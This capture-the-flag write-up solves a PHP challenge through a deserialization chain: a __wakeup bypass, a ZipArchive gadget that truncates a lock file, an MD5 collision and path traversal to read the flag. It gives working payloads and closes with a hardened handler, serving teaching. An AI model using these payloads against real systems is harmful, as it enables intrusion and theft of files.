Start the challenge environment. The source is shown when no parameters are posted:
<?php
error_reporting(0);
ini_set("display_errors","Off");

class Jesen {
    public $filename;
    public $content;
    public $me;

    function __wakeup(){
        $this->me = new Ctf();
    }

    function __destruct() {
        $this->me->open($this->filename,$this->content);
    }
}

class Ctf {
    function __toString() {
        return "die";
    }

    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?");
        }
    }
}

if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
    }
}
Step 1: we need to bypass __wakeup(), otherwise it replaces $me with a fresh Ctf and we lose control of the object that __destruct() calls open() on.
Once inside Ctf::open(), the branch depends on ./sandbox/lock.lock: if the file exists (and is non-empty) we land in the else branch. Requesting the file directly shows that it does exist, so that is where we end up.
The else branch is obviously asking us to guess the written filename, but the name is md5($filename . time()), so guessing it is not realistic.
Instead, run the script below to build the parameters, then use them to wipe the lock file: $me is set to a ZipArchive, and ZipArchive::open("./sandbox/lock.lock", 8) (8 is ZipArchive::OVERWRITE) truncates the file, so on the next request file_get_contents() returns an empty string and the first branch is taken.
<?php
class Jesen {
    public $filename = './sandbox/lock.lock';
    public $content = 8;   // 8 == ZipArchive::OVERWRITE: open() truncates the lock file
    public $me;
}

$a = new Jesen();
$zip = new ZipArchive;
$a->me = $zip;             // __destruct() will call ZipArchive::open($filename, $content)
$b = serialize($a);
// Bump the declared property count from 3 to 4 so that __wakeup() is skipped
$b = str_replace('":3:','":4:',$b);
echo $b;
echo "\n";
Then POST it (a[] and b[] are arrays, which satisfies the md5 check for this step):
a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}
For the real a and b we need an MD5 collision, generated with the fastcoll tool using the following prefix:
fastcoll
./../../../../../../../../flag
This produces two files.
I was still not sure whether it had actually worked,
so I checked with a PHP script:
<?php
function readmyfile($path){
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}

echo md5(readmyfile("1.txt"));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5(readmyfile("2.txt"));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));
Run it.
The two digests are indeed identical,
so the files can be URL-encoded directly:
<?php
function readmyfile($path){
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}

//echo md5(readmyfile("1.txt"));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5(readmyfile("2.txt"));
echo '============================';
echo urlencode(readmyfile("2.txt"));
Now that we have a and b, we still need the value of c:
<?php
class Jesen {
    public $filename;
    public $content;
    public $me;
}

$a = new Jesen();
echo serialize($a);
Then POST the parameters and the flag comes back:
a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9F%EA%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FFe%A1_%3A%F1Dg%9Fh%858%84%9Fdj%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%9B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%E0%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2iL%8C%F8%BD&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9Fj%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FF%E5%A1_%3A%F1Dg%9Fh%858%84%9Fd%EA%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%1B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%60%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2%E9L%8C%F8%BD&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
Flag obtained.
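For contrast, here is a hardened version of the request handler, added to this writeup as an example (it is not part of the challenge code). It shows the four checks that would have stopped each step of the chain above: rejecting non-string input (the a[]=1&b[]=2 trick), comparing digests with a collision-resistant hash, decoding c as JSON instead of calling unserialize(), and confining the file read to the sandbox directory. The function names, SANDBOX_DIR, and the sample requests are assumptions of this example, and it targets PHP 8.

```php
<?php
declare(strict_types=1);
// Added hardening example, not the challenge's own code. Assumed names:
// safe_gate(), SANDBOX_DIR, and the constructed requests at the bottom. PHP 8.

const SANDBOX_DIR = './sandbox';

// 1. a[]=1&b[]=2 arrives as arrays. On PHP 7, md5() of an array is NULL (with
//    only a warning), so "different values, identical md5" holds with no
//    collision at all. Accept plain, NUL-free strings only.
function plain_string(array $post, string $key): ?string
{
    $v = $post[$key] ?? null;
    return (is_string($v) && !str_contains($v, "\0")) ? $v : null;
}

// 2. If two inputs must be compared by digest, use a collision-resistant hash
//    and a constant-time comparison. fastcoll finds MD5 collisions in seconds;
//    there is no comparable tool for SHA-256.
function same_digest(string $a, string $b): bool
{
    return hash_equals(hash('sha256', $a), hash('sha256', $b));
}

// 3. Never hand attacker bytes to unserialize(). JSON carries data only, so
//    there is no __wakeup/__destruct/__toString gadget to chain, and the
//    property-count edit that skipped __wakeup() has nothing to act on.
function decode_untrusted(string $blob): ?array
{
    try {
        $data = json_decode($blob, true, 8, JSON_THROW_ON_ERROR);
    } catch (JsonException) {
        return null;
    }
    return is_array($data) ? $data : null;
}

// 4. The chain ended in file_get_contents() on a user-supplied path. Allow a
//    bare file name only: no slashes, no leading dot, so "./../../flag" and
//    ".." are rejected while "lock.lock" is accepted.
function sandbox_path(string $name): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)?\z/', $name) !== 1) {
        return null;
    }
    return SANDBOX_DIR . '/' . $name;
}

// Returns a decision string instead of acting, so it can be exercised offline.
function safe_gate(array $post): string
{
    $a = plain_string($post, 'a');
    $b = plain_string($post, 'b');
    $c = plain_string($post, 'c');
    if ($a === null || $b === null || $c === null) {
        return 'reject: a, b and c must be NUL-free strings';
    }
    if (!same_digest($a, $b)) {
        return 'reject: digest mismatch';
    }
    $data = decode_untrusted($c);
    if ($data === null || !isset($data['filename']) || !is_string($data['filename'])) {
        return 'reject: c is not a JSON object with a string filename';
    }
    $path = sandbox_path($data['filename']);
    if ($path === null) {
        return 'reject: filename escapes the sandbox';
    }
    return 'accept: would read ' . $path;
}

// Constructed requests mirroring the shapes used in the writeup (the serialized
// blobs are the ones shown above; the collision bytes are not reproduced).
$requests = [
    'array trick'    => ['a' => ['1'], 'b' => ['2'],
                         'c' => 'O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}'],
    'serialized c'   => ['a' => 'x', 'b' => 'x',
                         'c' => 'O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";N;}'],
    'traversal name' => ['a' => 'x', 'b' => 'x', 'c' => '{"filename":"./../../flag"}'],
    'benign'         => ['a' => 'x', 'b' => 'x', 'c' => '{"filename":"lock.lock"}'],
];
foreach ($requests as $label => $post) {
    printf("%-15s %s\n", $label, safe_gate($post));
}
```

Only the last request is accepted; the first three are turned away at the check that corresponds to the step of the chain they imitate. The original gate's condition (a and b differ but share an MD5) is a deliberate puzzle rather than something a real handler would require, so the hardened version simply checks that the two digests agree.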
Leave a comment if anything is unclear.